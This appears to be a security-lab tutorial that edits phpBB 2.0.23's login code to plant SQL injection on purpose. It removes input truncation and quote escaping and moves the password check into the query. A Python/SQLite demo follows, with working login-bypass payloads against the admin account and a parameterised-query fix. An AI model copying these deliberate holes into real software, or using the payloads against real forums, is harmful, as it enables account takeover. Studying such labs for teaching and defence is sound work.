The following works in phpBB 2.0.23; the line numbers are based on the original phpBB2 source files.

I. Goal: modify the source code of phpBB2 to introduce an SQL injection vulnerability (PostgreSQL only) into the 'username' input textbox on login.php.

Note: the modifications are ordered by the sequence of security checks phpBB performs on the input.

1. templates/subSilver/login_body.tpl line 22:
   maxlength="40" -> maxlength="80"
   # Enlarges the HTML input length so a longer malicious string can be entered.

2. includes/functions.php line 80:
   0, 25); -> 0, 80);
   # Same as above: enlarges the legal input length (the server-side truncation).

3. includes/functions.php lines 81,82: comment out these two lines.
   # These two lines filter the string (escape the single quotes) to prevent SQL injection.

4. login.php line 62:
   WHERE username = '" . str_replace("\\'", "''", $username) . "'";
   -> WHERE username = '" . $username . "'";
   # This is the last line of defence against SQL injection: the escaped quote is no longer turned into the SQL-standard doubled quote.

II. Goal: modify the source code of phpBB2 to introduce an SQL injection vulnerability (PostgreSQL and MySQL) into login.php.

# The following modification moves the password check out of PHP and into the SQL query (the comparison still uses the md5 hash stored in user_password), so an injected username can short-circuit the password check as well. For consistency, we assume you have done the above modifications.

1. login.php line 90: replace line 90 with the following lines:

   // Username and the md5 of the submitted password are both concatenated into the query unescaped.
   $sql_checkpasswd = "SELECT user_id, username, user_password, user_active, user_level, user_login_tries, user_last_login_try
       FROM " . USERS_TABLE . "
       WHERE username = '" . $username . "'" . " AND user_password = '" . md5($password) . "'";
   if ( !($result_checkpasswd = $db->sql_query($sql_checkpasswd)) )
   {
       // Report the query that actually failed ($sql_checkpasswd, not the earlier $sql).
       message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql_checkpasswd);
   }
   $row = $db->sql_fetchrow($result_checkpasswd);
   // The md5 comparison that used to be here is now done by the WHERE clause.
   if( $row && $row['user_active'] )
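To see what each removed defence was doing, the following is an added example (not phpBB's own code) that rebuilds both login-query shapes from the steps above in Python against an in-memory SQLite table: the Part I shape, where the password is compared in PHP after the query, and the Part II shape, where the comparison is in the WHERE clause. The users table, the admin account, the passwords and the payloads are constructed for the demonstration; escape_username collapses functions.php lines 80-82 and login.php line 62 into one step (25-character truncation, then doubling single quotes). SQLite accepts the same -- comment and UNION syntax as PostgreSQL, so the payloads behave as they would there; MySQL additionally needs a space after --, which the payloads include.

```python
import hashlib
import sqlite3

USERS_TABLE = "phpbb_users"  # phpBB's default table prefix (assumed)
COLUMNS = ("user_id, username, user_password, user_active, "
           "user_level, user_login_tries, user_last_login_try")


def md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed fixture: one active admin with an md5-hashed password."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE {USERS_TABLE} (user_id INTEGER, username TEXT, "
               "user_password TEXT, user_active INTEGER, user_level INTEGER, "
               "user_login_tries INTEGER, user_last_login_try INTEGER)")
    db.execute(f"INSERT INTO {USERS_TABLE} VALUES (2, 'admin', ?, 1, 1, 0, 0)",
               (md5("s3cret-admin-pw"),))
    db.commit()
    return db


def escape_username(username: str) -> str:
    """The defence chain the tutorial removes, in one step: substr(..., 0, 25)
    (functions.php line 80) then ' -> '' (lines 81-82 produce \\' and
    login.php line 62 turns that into the SQL-standard '')."""
    return username[:25].replace("'", "''")


def login_part1(db, username, password, escape=True):
    """Part I shape: select by username only, compare md5 in PHP afterwards
    (original login.php line 90)."""
    name = escape_username(username) if escape else username
    sql = f"SELECT {COLUMNS} FROM {USERS_TABLE} WHERE username = '{name}'"
    row = db.execute(sql).fetchone()          # sql_query + sql_fetchrow
    if row and md5(password) == row[2] and row[3]:
        return row[1]
    return None


def login_part2(db, username, password, escape=True):
    """Part II shape: the password comparison is moved into the WHERE clause."""
    name = escape_username(username) if escape else username
    sql = (f"SELECT {COLUMNS} FROM {USERS_TABLE} WHERE username = '{name}'"
           f" AND user_password = '{md5(password)}'")
    row = db.execute(sql).fetchone()
    if row and row[3]:
        return row[1]
    return None


def login_parameterised(db, username, password):
    """The fix: bound parameters, so quotes in the input are data, not syntax."""
    row = db.execute(f"SELECT {COLUMNS} FROM {USERS_TABLE} "
                     "WHERE username = ? AND user_password = ?",
                     (username, md5(password))).fetchone()
    if row and row[3]:
        return row[1]
    return None


# Constructed payloads. Part II only needs to comment out the password clause.
PART2_PAYLOAD = "admin' -- "
# Part I still compares md5($password) against the returned row in PHP, so the
# attacker must supply that row: a UNION with the seven selected columns and a
# hash the attacker knows. It is 78 characters, which is why the 25/40-character
# limits had to be raised to 80 in steps 1 and 2.
PART1_PAYLOAD = "x' UNION SELECT 2, 'admin', '" + md5("pw") + "', 1, 1, 0, 0 -- "


def demo():
    """Returns (payload, variant, escaped) -> user logged in as (or None)."""
    results = {}
    for escape in (True, False):
        results[("part1", escape)] = login_part1(make_db(), PART1_PAYLOAD, "pw", escape)
        results[("part2", escape)] = login_part2(make_db(), PART2_PAYLOAD, "wrong", escape)
    results["parameterised"] = login_parameterised(make_db(), PART2_PAYLOAD, "wrong")
    return results


if __name__ == "__main__":
    for key, who in demo().items():
        print(key, "->", who)
```

With the escaping in place both payloads end up inside a string literal (the Part I one is also cut to 25 characters before the quotes are doubled) and no row is returned; with it removed, the Part II payload logs in as admin with any password, and the Part I payload logs in as admin only because it carries its own hash, which is the difference between the two parts of the tutorial.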